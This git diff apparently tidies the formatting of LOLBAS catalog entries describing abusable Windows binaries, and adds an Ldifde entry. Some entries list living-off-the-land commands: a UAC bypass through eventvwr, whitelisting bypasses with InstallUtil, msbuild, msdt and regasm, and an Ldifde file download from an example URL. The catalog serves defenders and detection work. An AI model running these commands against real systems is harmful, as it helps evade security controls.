  - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe
 Code_Sample:
- Code:
+  - Code:
 Detection:
- - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml
 Resources:
  - Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
  - Link: https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe
 Acknowledgement:
  - Person: Casey Smith
    Handle: '@subtee'
---
--- a/yml/OSBinaries/Diantz.yml
+++ b/yml/OSBinaries/Diantz.yml
@ -35,4 +35,3 @@ Acknowledgement:
    Handle: '@tim8288'
  - Person: Hai Vaknin
    Handle: '@vakninhai'
---
--- a/yml/OSBinaries/Diskshadow.yml
+++ b/yml/OSBinaries/Diskshadow.yml
@ -22,15 +22,14 @@ Full_Path:
  - Path: C:\Windows\System32\diskshadow.exe
  - Path: C:\Windows\SysWOW64\diskshadow.exe
 Code_Sample:
- Code:
+  - Code:
 Detection:
- - Sigma: https://github.com/SigmaHQ/sigma/blob/b4d5b44ea86cda24f38a87d3b0c5f9d4455bf841/rules/windows/process_creation/win_susp_diskshadow.yml
- - Sigma: https://github.com/SigmaHQ/sigma/blob/b3df5bf325461df9bcfeb051895b0c8dc3258234/rules/windows/process_creation/win_shadow_copies_deletion.yml
- - Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml
- - IOC: Child process from diskshadow.exe
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/b4d5b44ea86cda24f38a87d3b0c5f9d4455bf841/rules/windows/process_creation/win_susp_diskshadow.yml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/b3df5bf325461df9bcfeb051895b0c8dc3258234/rules/windows/process_creation/win_shadow_copies_deletion.yml
+  - Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml
+  - IOC: Child process from diskshadow.exe
 Resources:
  - Link: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
 Acknowledgement:
  - Person: Jimmy
    Handle: '@bohops'
---
--- a/yml/OSBinaries/Dnscmd.yml
+++ b/yml/OSBinaries/Dnscmd.yml
@ -15,10 +15,10 @@ Full_Path:
  - Path: C:\Windows\System32\Dnscmd.exe
  - Path: C:\Windows\SysWOW64\Dnscmd.exe
 Code_Sample:
- Code:
+  - Code:
 Detection:
- - Sigma: https://github.com/SigmaHQ/sigma/blob/b08b3e2b0d5111c637dbede1381b07cb79f8c2eb/rules/windows/process_creation/process_creation_dns_serverlevelplugindll.yml
- - IOC: Dnscmd.exe loading dll from UNC/arbitrary path
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/b08b3e2b0d5111c637dbede1381b07cb79f8c2eb/rules/windows/process_creation/process_creation_dns_serverlevelplugindll.yml
+  - IOC: Dnscmd.exe loading dll from UNC/arbitrary path
 Resources:
  - Link: https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
  - Link: https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html
@ -32,4 +32,3 @@ Acknowledgement:
    Handle: '@dim0x69'
  - Person: Nikhil SamratAshok
    Handle: '@nikhil_mitt'
---
--- a/yml/OSBinaries/Esentutl.yml
+++ b/yml/OSBinaries/Esentutl.yml
@ -51,14 +51,14 @@ Full_Path:
  - Path: C:\Windows\System32\esentutl.exe
  - Path: C:\Windows\SysWOW64\esentutl.exe
 Code_Sample:
- Code:
+  - Code:
 Detection:
- - Sigma: https://github.com/SigmaHQ/sigma/blob/fb750721b25ec4573acc32a0822d047a8ecdf269/rules/windows/deprecated/win_susp_vssadmin_ntds_activity.yml
- - Sigma: https://github.com/SigmaHQ/sigma/blob/fb750721b25ec4573acc32a0822d047a8ecdf269/rules/windows/deprecated/win_susp_esentutl_activity.yml
- - Sigma: https://github.com/SigmaHQ/sigma/blob/bacb44ab972343358bae612e4625f8ba2e043573/rules/windows/process_creation/process_susp_esentutl_params.yml
- - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_copying_sensitive_files_with_credential_data.yml
- - Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/esentutl_sam_copy.yml
- - Elastic: https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/fb750721b25ec4573acc32a0822d047a8ecdf269/rules/windows/deprecated/win_susp_vssadmin_ntds_activity.yml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/fb750721b25ec4573acc32a0822d047a8ecdf269/rules/windows/deprecated/win_susp_esentutl_activity.yml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/bacb44ab972343358bae612e4625f8ba2e043573/rules/windows/process_creation/process_susp_esentutl_params.yml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_copying_sensitive_files_with_credential_data.yml
+  - Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/esentutl_sam_copy.yml
+  - Elastic: https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml
 Resources:
  - Link: https://twitter.com/egre55/status/985994639202283520
  - Link: https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/
@ -67,5 +67,4 @@ Acknowledgement:
  - Person: egre55
    Handle: '@egre55'
  - Person: Mike Cary
-    Handle: 'grayfold3d'
---
+    Handle: '@grayfold3d'
--- a/yml/OSBinaries/Eventvwr.yml
+++ b/yml/OSBinaries/Eventvwr.yml
@ -7,7 +7,7 @@ Commands:
  - Command: eventvwr.exe
    Description: During startup, eventvwr.exe checks the registry value HKCU\Software\Classes\mscfile\shell\open\command for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user.
    Usecase: Execute a binary or script as a high-integrity process without a UAC prompt.
-    Category: UAC bypass
+    Category: UAC Bypass
    Privileges: User
    MitreID: T1548.002
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -31,4 +31,3 @@ Acknowledgement:
    Handle: '@enigma0x3'
  - Person: Matt Graeber
    Handle: '@mattifestation'
---
--- a/yml/OSBinaries/Expand.yml
+++ b/yml/OSBinaries/Expand.yml
@ -29,10 +29,10 @@ Full_Path:
  - Path: C:\Windows\System32\Expand.exe
  - Path: C:\Windows\SysWOW64\Expand.exe
 Code_Sample:
- Code:
+  - Code:
 Detection:
- - Sigma: https://github.com/SigmaHQ/sigma/blob/b25fbbea54014565fc4551f94c97c0d7550b1c04/rules/windows/process_creation/sysmon_expand_cabinet_files.yml
- - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/b25fbbea54014565fc4551f94c97c0d7550b1c04/rules/windows/process_creation/sysmon_expand_cabinet_files.yml
+  - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml
 Resources:
  - Link: https://twitter.com/infosecn1nja/status/986628482858807297
  - Link: https://twitter.com/Oddvarmoe/status/986709068759949319
@ -41,4 +41,3 @@ Acknowledgement:
    Handle: '@infosecn1nja'
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
---
--- a/yml/OSBinaries/Explorer.yml
+++ b/yml/OSBinaries/Explorer.yml
@ -37,4 +37,3 @@ Acknowledgement:
    Handle: '@CyberRaiju'
  - Person: Jimmy
    Handle: '@bohops'
---
--- a/yml/OSBinaries/Extexport.yml
+++ b/yml/OSBinaries/Extexport.yml
@ -1,6 +1,6 @@
 ---
 Name: Extexport.exe
-Description:
+Description: Load a DLL located in the c:\test folder with a specific name.
 Author: 'Oddvar Moe'
 Created: 2018-05-25
 Commands:
@ -15,7 +15,7 @@ Full_Path:
  - Path: C:\Program Files\Internet Explorer\Extexport.exe
  - Path: C:\Program Files (x86)\Internet Explorer\Extexport.exe
 Code_Sample:
- - Code:
+  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/0f33cbc85bf4b23b8d8308bfcc8b21a9e5431ee7/rules/windows/process_creation/win_pc_lolbas_extexport.yml
  - IOC: Extexport.exe loads dll and is execute from other folder the original path
@ -24,4 +24,3 @@ Resources:
 Acknowledgement:
  - Person: Adam
    Handle: '@hexacorn'
---
--- a/yml/OSBinaries/Extrac32.yml
+++ b/yml/OSBinaries/Extrac32.yml
@ -1,6 +1,6 @@
 ---
 Name: Extrac32.exe
-Description:
+Description: Extract to ADS, copy or overwrite a file with Extrac32.exe
 Author: 'Oddvar Moe'
 Created: 2018-05-25
 Commands:
@ -38,9 +38,9 @@ Full_Path:
 Code_Sample:
  - Code:
 Detection:
- - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml
- - Sigma: https://github.com/SigmaHQ/sigma/blob/0f33cbc85bf4b23b8d8308bfcc8b21a9e5431ee7/rules/windows/process_creation/win_pc_lolbas_extrac32.yml
- - Sigma: https://github.com/SigmaHQ/sigma/blob/0f33cbc85bf4b23b8d8308bfcc8b21a9e5431ee7/rules/windows/process_creation/win_pc_lolbas_extrac32_ads.yml
+  - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/0f33cbc85bf4b23b8d8308bfcc8b21a9e5431ee7/rules/windows/process_creation/win_pc_lolbas_extrac32.yml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/0f33cbc85bf4b23b8d8308bfcc8b21a9e5431ee7/rules/windows/process_creation/win_pc_lolbas_extrac32_ads.yml
 Resources:
  - Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
  - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
@ -54,4 +54,3 @@ Acknowledgement:
    Handle: '@VakninHai'
  - Person: Tamir Yehuda
    Handle: '@tim8288'
---
--- a/yml/OSBinaries/Findstr.yml
+++ b/yml/OSBinaries/Findstr.yml
@ -1,6 +1,6 @@
 ---
 Name: Findstr.exe
-Description:
+Description: Write to ADS, discover, or download files with Findstr.exe
 Author: 'Oddvar Moe'
 Created: 2018-05-25
 Commands:
@ -36,13 +36,12 @@ Full_Path:
  - Path: C:\Windows\System32\findstr.exe
  - Path: C:\Windows\SysWOW64\findstr.exe
 Code_Sample:
- Code:
+  - Code:
 Detection:
- - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_findstr.yml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_findstr.yml
 Resources:
  - Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
  - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
 Acknowledgement:
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
---
--- a/yml/OSBinaries/Finger.yml
+++ b/yml/OSBinaries/Finger.yml
@ -28,4 +28,3 @@ Acknowledgement:
    Handle: '@Ocelotty6669'
  - Person: Malwrologist
    Handle: '@DissectMalware'
---
--- a/yml/OSBinaries/FltMC.yml
+++ b/yml/OSBinaries/FltMC.yml
@ -25,4 +25,3 @@ Resources:
 Acknowledgement:
  - Person: Carlos Perez
    Handle: '@Carlos_Perez'
---
--- a/yml/OSBinaries/Forfiles.yml
+++ b/yml/OSBinaries/Forfiles.yml
@ -22,9 +22,9 @@ Full_Path:
  - Path: C:\Windows\System32\forfiles.exe
  - Path: C:\Windows\SysWOW64\forfiles.exe
 Code_Sample:
- Code:
+  - Code:
 Detection:
- - Sigma: https://github.com/SigmaHQ/sigma/blob/ff0f1a0222b5100120ae3e43df18593f904c69c0/rules/windows/process_creation/win_indirect_cmd.yml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/ff0f1a0222b5100120ae3e43df18593f904c69c0/rules/windows/process_creation/win_indirect_cmd.yml
 Resources:
  - Link: https://twitter.com/vector_sec/status/896049052642533376
  - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
@ -34,4 +34,3 @@ Acknowledgement:
    Handle: '@vector_sec'
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
---
--- a/yml/OSBinaries/Ftp.yml
+++ b/yml/OSBinaries/Ftp.yml
@ -22,10 +22,10 @@ Full_Path:
  - Path: C:\Windows\System32\ftp.exe
  - Path: C:\Windows\SysWOW64\ftp.exe
 Code_Sample:
- Code:
+  - Code:
 Detection:
- - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_ftp.yml
- - IOC: cmd /c as child process of ftp.exe
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_ftp.yml
+  - IOC: cmd /c as child process of ftp.exe
 Resources:
  - Link: https://twitter.com/0xAmit/status/1070063130636640256
  - Link: https://medium.com/@0xamit/lets-talk-about-security-research-discoveries-and-proper-discussion-etiquette-on-twitter-10f9be6d1939
@ -37,5 +37,4 @@ Acknowledgement:
  - Person: BennyHusted
    Handle: ''
  - Person: Amit Serper
-    Handle: '@0xAmit '
---
+    Handle: '@0xAmit'
--- a/yml/OSBinaries/GfxDownloadWrapper.yml
+++ b/yml/OSBinaries/GfxDownloadWrapper.yml
@ -176,4 +176,3 @@ Resources:
 Acknowledgement:
  - Person: Jesus Galvez
    Handle:
---
--- a/yml/OSBinaries/Gpscript.yml
+++ b/yml/OSBinaries/Gpscript.yml
@ -32,4 +32,3 @@ Resources:
 Acknowledgement:
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
---
--- a/yml/OSBinaries/Hh.yml
+++ b/yml/OSBinaries/Hh.yml
@ -35,4 +35,3 @@ Resources:
 Acknowledgement:
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
---
--- a/yml/OSBinaries/IMEWDBLD.yml
+++ b/yml/OSBinaries/IMEWDBLD.yml
@ -20,4 +20,3 @@ Resources:
 Acknowledgement:
  - Person: Wade Hickey
    Handle: '@notwhickey'
---
--- a/yml/OSBinaries/Ie4uinit.yml
+++ b/yml/OSBinaries/Ie4uinit.yml
@ -1,6 +1,6 @@
 ---
 Name: Ie4uinit.exe
-Description:
+Description: Executes commands from a specially prepared ie4uinit.inf file.
 Author: 'Oddvar Moe'
 Created: 2018-05-25
 Commands:
@ -27,4 +27,3 @@ Resources:
 Acknowledgement:
  - Person: Jimmy
    Handle: '@bohops'
---
--- a/yml/OSBinaries/Ieexec.yml
+++ b/yml/OSBinaries/Ieexec.yml
@ -34,4 +34,3 @@ Resources:
 Acknowledgement:
  - Person: Casey Smith
    Handle: '@subtee'
---
--- a/yml/OSBinaries/Ilasm.yml
+++ b/yml/OSBinaries/Ilasm.yml
@ -33,4 +33,3 @@ Acknowledgement:
    Handle: '@VakninHai'
  - Person: Lior Adar
    Handle:
---
--- a/yml/OSBinaries/Infdefaultinstall.yml
+++ b/yml/OSBinaries/Infdefaultinstall.yml
@ -15,10 +15,10 @@ Full_Path:
  - Path: C:\Windows\System32\Infdefaultinstall.exe
  - Path: C:\Windows\SysWOW64\Infdefaultinstall.exe
 Code_Sample:
- Code: https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
+  - Code: https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
 Detection:
- - Sigma: https://github.com/SigmaHQ/sigma/blob/85d47aeabc25bbd023284849f4466c1e00b855ce/rules/windows/process_creation/process_creation_infdefaultinstall.yml
- - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/85d47aeabc25bbd023284849f4466c1e00b855ce/rules/windows/process_creation/process_creation_infdefaultinstall.yml
+  - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
 Resources:
  - Link: https://twitter.com/KyleHanslovan/status/911997635455852544
  - Link: https://blog.conscioushacker.io/index.php/2017/10/25/evading-microsofts-autoruns/
@ -26,4 +26,3 @@ Resources:
 Acknowledgement:
  - Person: Kyle Hanslovan
    Handle: '@kylehanslovan'
---
--- a/yml/OSBinaries/Installutil.yml
+++ b/yml/OSBinaries/Installutil.yml
@ -7,7 +7,7 @@ Commands:
  - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
    Description: Execute the target .NET DLL or EXE.
    Usecase: Use to execute code and bypass application whitelisting
-    Category: AWL bypass
+    Category: AWL Bypass
    Privileges: User
    MitreID: T1218.004
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
@ -24,11 +24,11 @@ Full_Path:
  - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
 Code_Sample:
- Code:
+  - Code:
 Detection:
- - Sigma: https://github.com/SigmaHQ/sigma/blob/a04fbe2a99f1dcbbfeb0ee4957ae4b06b0866254/rules/windows/process_creation/win_possible_applocker_bypass.yml
- - Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_installutil_beacon.toml
- - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/a04fbe2a99f1dcbbfeb0ee4957ae4b06b0866254/rules/windows/process_creation/win_possible_applocker_bypass.yml
+  - Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_installutil_beacon.toml
+  - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
 Resources:
  - Link: https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/
  - Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12
@ -39,4 +39,3 @@ Resources:
 Acknowledgement:
  - Person: Casey Smith
    Handle: '@subtee'
---
--- a/yml/OSBinaries/Jsc.yml
+++ b/yml/OSBinaries/Jsc.yml
@ -34,4 +34,3 @@ Resources:
 Acknowledgement:
  - Person: Malwrologist
    Handle: '@DissectMalware'
---
--- a/yml/OSBinaries/Ldifde.yml
+++ b/yml/OSBinaries/Ldifde.yml
@ -0,0 +1,30 @@
+---
+Name: Ldifde.exe
+Description: Creates, modifies, and deletes LDAP directory objects.
+Author: 'Grzegorz Tworek'
+Created: 2022-08-31
+Commands:
+  - Command: Ldifde -i -f inputfile.ldf
+    Description: Import inputfile.ldf into LDAP. If the file contains http-based attrval-spec such as thumbnailPhoto:< http://example.org/somefile.txt, the file will be downloaded into IE temp folder.
+    Usecase: Download file from Internet
+    Category: Download
+    Privileges: Administrator
+    MitreID: T1105
+    OperatingSystem: Windows Server with AD Domain Services role,  Windows 10 with AD LDS role.
+Full_Path:
+  - Path: c:\windows\system32\ldifde.exe
+  - Path: c:\windows\syswow64\ldifde.exe
+Code_Sample:
+  - Code:
+Detection:
+  - IOC:
+  - Analysis:
+  - Sigma:
+  - Elastic:
+  - Splunk:
+  - BlockRule:
+Resources:
+  - Link: https://twitter.com/0gtweet/status/1564968845726580736
+Acknowledgement:
+  - Person: Grzegorz Tworek
+    Handle: '@0gtweet'
--- a/yml/OSBinaries/Makecab.yml
+++ b/yml/OSBinaries/Makecab.yml
@ -40,4 +40,3 @@ Resources:
 Acknowledgement:
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
---
--- a/yml/OSBinaries/Mavinject.yml
+++ b/yml/OSBinaries/Mavinject.yml
@ -36,4 +36,3 @@ Acknowledgement:
    Handle: '@gN3mes1s'
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
---
--- a/yml/OSBinaries/Microsoft.Workflow.Compiler.yml
+++ b/yml/OSBinaries/Microsoft.Workflow.Compiler.yml
@ -56,4 +56,3 @@ Acknowledgement:
    Handle: '@FortyNorthSec'
  - Person: Bank Security
    Handle: '@Bank_Security'
---
--- a/yml/OSBinaries/Mmc.yml
+++ b/yml/OSBinaries/Mmc.yml
@ -22,10 +22,10 @@ Full_Path:
  - Path: C:\Windows\System32\mmc.exe
  - Path: C:\Windows\SysWOW64\mmc.exe
 Code_Sample:
- Code:
+  - Code:
 Detection:
- - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_mmc_spawn_shell.yml
- - Sigma: https://github.com/SigmaHQ/sigma/blob/b731c2059445eef53e37232a5f3634c3473aae0c/rules/windows/file_event/sysmon_uac_bypass_dotnet_profiler.yml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_mmc_spawn_shell.yml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/b731c2059445eef53e37232a5f3634c3473aae0c/rules/windows/file_event/sysmon_uac_bypass_dotnet_profiler.yml
 Resources:
  - Link: https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/
  - Link: https://offsec.almond.consulting/UAC-bypass-dotnet.html
@ -34,4 +34,3 @@ Acknowledgement:
    Handle: '@bohops'
  - Person: clem
    Handle: '@clavoillotte'
---
--- a/yml/OSBinaries/MpCmdRun.yml
+++ b/yml/OSBinaries/MpCmdRun.yml
@ -53,4 +53,3 @@ Acknowledgement:
    Handle: ''
  - Person: Cedric
    Handle: '@th3c3dr1c'
---
--- a/yml/OSBinaries/Msbuild.yml
+++ b/yml/OSBinaries/Msbuild.yml
@ -7,7 +7,7 @@ Commands:
  - Command: msbuild.exe pshell.xml
    Description: Build and execute a C# project stored in the target XML file.
    Usecase: Compile and run code
-    Category: AWL bypass
+    Category: AWL Bypass
    Privileges: User
    MitreID: T1127.001
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
@ -78,4 +78,3 @@ Acknowledgement:
    Handle: '@Cneelis'
  - Person: Jimmy
    Handle: '@bohops'
---
--- a/yml/OSBinaries/Msconfig.yml
+++ b/yml/OSBinaries/Msconfig.yml
@ -24,4 +24,3 @@ Resources:
 Acknowledgement:
  - Person: Pierre-Alexandre Braeken
    Handle: '@pabraeken'
---
--- a/yml/OSBinaries/Msdt.yml
+++ b/yml/OSBinaries/Msdt.yml
@ -14,7 +14,7 @@ Commands:
  - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
    Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
    Usecase: Execute code bypass Application whitelisting
-    Category: AWL bypass
+    Category: AWL Bypass
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
@ -33,4 +33,3 @@ Resources:
 Acknowledgement:
  - Person:
    Handle:
---
--- a/yml/OSBinaries/Mshta.yml
+++ b/yml/OSBinaries/Mshta.yml
@ -69,4 +69,3 @@ Acknowledgement:
    Handle: '@subtee'
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
---
--- a/yml/OSBinaries/Msiexec.yml
+++ b/yml/OSBinaries/Msiexec.yml
@ -51,4 +51,3 @@ Acknowledgement:
    Handle: '@netbiosX'
  - Person: Philip Tsukerman
    Handle: '@PhilipTsukerman'
---
--- a/yml/OSBinaries/Netsh.yml
+++ b/yml/OSBinaries/Netsh.yml
@ -34,4 +34,3 @@ Acknowledgement:
    Handle:
  - Person: 'Xabier Ugarte-Pedrero'
    Handle:
---
--- a/yml/OSBinaries/Odbcconf.yml
+++ b/yml/OSBinaries/Odbcconf.yml
@ -36,4 +36,3 @@ Acknowledgement:
    Handle: '@subtee'
  - Person: Adam
    Handle: '@Hexacorn'
---
--- a/yml/OSBinaries/OfflineScannerShell.yml
+++ b/yml/OSBinaries/OfflineScannerShell.yml
@ -19,4 +19,3 @@ Detection:
 Acknowledgement:
  - Person: Elliot Killick
    Handle: '@elliotkillick'
---
--- a/yml/OSBinaries/OneDriveStandaloneUpdater.yml
+++ b/yml/OSBinaries/OneDriveStandaloneUpdater.yml
@ -21,4 +21,3 @@ Resources:
 Acknowledgement:
  - Person: Elliot Killick
    Handle: '@elliotkillick'
---
--- a/yml/OSBinaries/Pcalua.yml
+++ b/yml/OSBinaries/Pcalua.yml
@ -38,4 +38,3 @@ Acknowledgement:
    Handle: '@kylehanslovan'
  - Person: Fab
    Handle: '@0rbz_'
---
--- a/yml/OSBinaries/Pcwrun.yml
+++ b/yml/OSBinaries/Pcwrun.yml
@ -22,4 +22,3 @@ Resources:
 Acknowledgement:
  - Person: Pierre-Alexandre Braeken
    Handle: '@pabraeken'
---
--- a/yml/OSBinaries/Pktmon.yml
+++ b/yml/OSBinaries/Pktmon.yml
@ -31,4 +31,3 @@ Resources:
 Acknowledgement:
  - Person: Derek Johnson
    Handle: ''
---
--- a/yml/OSBinaries/Pnputil.yml
+++ b/yml/OSBinaries/Pnputil.yml
@ -22,4 +22,3 @@ Acknowledgement:
    Handle: '@LuxNoBulIshit'
  - Person: Avihay eldad
    Handle: '@aloneliassaf'
---
--- a/yml/OSBinaries/Presentationhost.yml
+++ b/yml/OSBinaries/Presentationhost.yml
@ -25,4 +25,3 @@ Resources:
 Acknowledgement:
  - Person: Casey Smith
    Handle: '@subtee'
---
--- a/yml/OSBinaries/Print.yml
+++ b/yml/OSBinaries/Print.yml
@ -40,4 +40,3 @@ Resources:
 Acknowledgement:
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
---
--- a/yml/OSBinaries/PrintBrm.yml
+++ b/yml/OSBinaries/PrintBrm.yml
@ -28,4 +28,3 @@ Resources:
 Acknowledgement:
  - Person: Elliot Killick
    Handle: '@elliotkillick'
---
--- a/yml/OSBinaries/Psr.yml
+++ b/yml/OSBinaries/Psr.yml
@ -25,4 +25,3 @@ Resources:
 Acknowledgement:
  - Person: Leon Rodenko
    Handle: '@L3m0nada'
---
--- a/yml/OSBinaries/Rasautou.yml
+++ b/yml/OSBinaries/Rasautou.yml
@ -24,4 +24,3 @@ Resources:
 Acknowledgement:
  - Person: FireEye
    Handle: '@FireEye'
---
--- a/yml/OSBinaries/Rdrleakdiag.yml
+++ b/yml/OSBinaries/Rdrleakdiag.yml
@ -41,4 +41,3 @@ Resources:
 Acknowledgement:
  - Person: Grzegorz Tworek
    Handle: '@0gtweet'
---
--- a/yml/OSBinaries/Reg.yml
+++ b/yml/OSBinaries/Reg.yml
@ -36,4 +36,3 @@ Resources:
 Acknowledgement:
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
---
--- a/yml/OSBinaries/Regasm.yml
+++ b/yml/OSBinaries/Regasm.yml
@ -7,7 +7,7 @@ Commands:
  - Command: regasm.exe AllTheThingsx64.dll
    Description: Loads the target .DLL file and executes the RegisterClass function.
    Usecase: Execute code and bypass Application whitelisting
-    Category: AWL bypass
+    Category: AWL Bypass
    Privileges: Local Admin
    MitreID: T1218.009
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
@ -38,4 +38,3 @@ Resources:
 Acknowledgement:
  - Person: Casey Smith
    Handle: '@subtee'
---
--- a/yml/OSBinaries/Regedit.yml
+++ b/yml/OSBinaries/Regedit.yml
@ -31,4 +31,3 @@ Resources:
 Acknowledgement:
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
---
--- a/yml/OSBinaries/Regini.yml
+++ b/yml/OSBinaries/Regini.yml
@ -25,4 +25,3 @@ Resources:
 Acknowledgement:
  - Person: Eli Salem
    Handle: '@elisalem9'
---
--- a/yml/OSBinaries/Register-cimprovider.yml
+++ b/yml/OSBinaries/Register-cimprovider.yml
@ -24,4 +24,3 @@ Resources:
 Acknowledgement:
  - Person: Philip Tsukerman
    Handle: '@PhilipTsukerman'
---
--- a/yml/OSBinaries/Regsvcs.yml
+++ b/yml/OSBinaries/Regsvcs.yml
@ -14,8 +14,8 @@ Commands:
  - Command: regsvcs.exe AllTheThingsx64.dll
    Description: Loads the target .DLL file and executes the RegisterClass function.
